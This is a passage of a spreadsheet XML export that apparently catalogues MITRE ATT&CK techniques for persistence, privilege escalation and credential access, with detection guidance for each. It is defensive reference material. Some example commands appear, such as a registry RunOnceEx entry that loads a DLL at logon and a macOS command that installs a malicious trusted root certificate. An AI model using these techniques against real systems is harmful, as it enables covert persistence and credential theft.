    <t>API monitoring,Windows event logs,Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as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&lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Endgame Process Injection July 2017)</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</si>
  <si>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Endgame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t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>PowerShell logs,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</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</si>
  <si>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</si>
  <si>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T1546.014</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</t>
  </si>
  <si>
    <t xml:space="preserve">There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: 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 </t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To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
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.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</si>
  <si>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t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring</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</si>
  <si>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</si>
  <si>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achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.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 (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)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The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.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</si>
  <si>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T1547.002</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</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</si>
  <si>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</si>
  <si>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 (Citation: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t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: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 (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring</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</si>
  <si>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</si>
  <si>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 (Citation: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</si>
  <si>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T1547.005</t>
  </si>
  <si>
    <t>Security Support Provider</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;</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</si>
  <si>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(Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands.
Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot.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 .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </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</si>
  <si>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 (Citation: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t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Shortcut Modification</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</si>
  <si>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</si>
  <si>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Adversaries may create or edit shortcuts to run a program during system boot or user login. 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[Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: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</si>
  <si>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T1547.011</t>
  </si>
  <si>
    <t>Plist Modification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</si>
  <si>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All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to run a program during system boot or user login. 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plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) 
A specific plist used for execution at login is &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items).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(Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method &lt;code&gt; SMLoginItemSetEnabled&lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,File monitoring,DLL monitoring,API monitoring</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.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print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call.(Citation: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t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process command-line parameters,API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
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
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Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</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</si>
  <si>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</si>
  <si>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privilege-escalation,defense-evasion</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However,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Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</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</si>
  <si>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Hijacking](https://attack.mitre.org/techniques/T1574/001),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keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</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</si>
  <si>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 (Citation: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 (Citation: TechNet Inside UAC) (Citation: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t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the suoders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 (Citation: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 (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</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</si>
  <si>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</si>
  <si>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T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>Office 365 audit logs,OAuth audit logs,Authentication logs</t>
  </si>
  <si>
    <t>Windows,Office 365,SaaS</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>defense-evasion,lateral-movement</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>Office 365 audit logs,OAuth audit logs</t>
  </si>
  <si>
    <t>Office 365,SaaS</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.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Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Pass the Hash</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</si>
  <si>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</si>
  <si>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hashes.(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Pass the Ticket</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</si>
  <si>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ticket.(Citation: CERT-EU Golden Ticket Protection)</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</si>
  <si>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In this technique,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[Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>Office 365 audit logs,Authentication logs</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Azure activity logs,Authentication logs,AWS CloudTrail logs,Windows event logs,File monitoring,Windows Registry,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment,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
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
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
Additionally, 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</si>
  <si>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</si>
  <si>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T1552.001</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring</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</si>
  <si>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</si>
  <si>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environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Credentials in Registry</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1552.003</t>
  </si>
  <si>
    <t>Bash History</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</si>
  <si>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</si>
  <si>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 (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Private Keys</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</si>
  <si>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</si>
  <si>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These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>Authentication logs,AWS CloudTrail logs,Azure activity logs</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
</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</si>
  <si>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attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</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</si>
  <si>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</si>
  <si>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T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec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deselected.(Citation: SpectorOps Subverting Trust Sept 2017)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 </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</si>
  <si>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</si>
  <si>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Application control,Anti-virus,Autoruns Analysis,Digital Certificate Validation,Process whitelisting,User Mode Signature Validation,Windows User Account Control</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further.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t>
  </si>
  <si>
    <t>Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. 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it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: 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(Citation: Clearing quarantine attribute) (Citation: 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(Citation: Bypassing Gatekeeper)</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</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</si>
  <si>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macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) 
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Windows Registry,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</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</si>
  <si>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[Regsvr32](https://attack.mitre.org/techniques/T1117).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</si>
  <si>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Signing](https://attack.mitre.org/techniques/T1116),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Hijacking](https://attack.mitre.org/techniques/T1038).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Application control,Autoruns Analysis,Digital Certificate Validation,User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Digital certificate logs</t>
  </si>
  <si>
    <t>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authroot.stl.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</si>
  <si>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 (Citation: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 (Citation: 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 (Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</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</si>
  <si>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Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,File monitoring,Process monitoring,System calls</t>
  </si>
  <si>
    <t>Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>PowerShell logs,Process monitoring,File monitoring,System calls,API monitoring</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Adversaries may collect the keychain storage data from a system to acquire credentials. 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 (Citation: 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 (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</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</si>
  <si>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 (Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: 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password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,PowerShell logs,Process monitoring</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</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</si>
  <si>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 (Citation: Microsoft CryptUnprotectData ‎April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)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</si>
  <si>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T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,API monitoring,Windows Registry,Process monitoring,DLL monitoring</t>
  </si>
  <si>
    <t>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
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
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</si>
  <si>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 xml:space="preserve">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or pluggable authentication modules (PAM) on Unix-based systems, responsible for gathering, storing, and validating credentials.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 </t>
  </si>
  <si>
    <t>credential-access,defense-evasion</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,DLL monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
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</si>
  <si>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t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
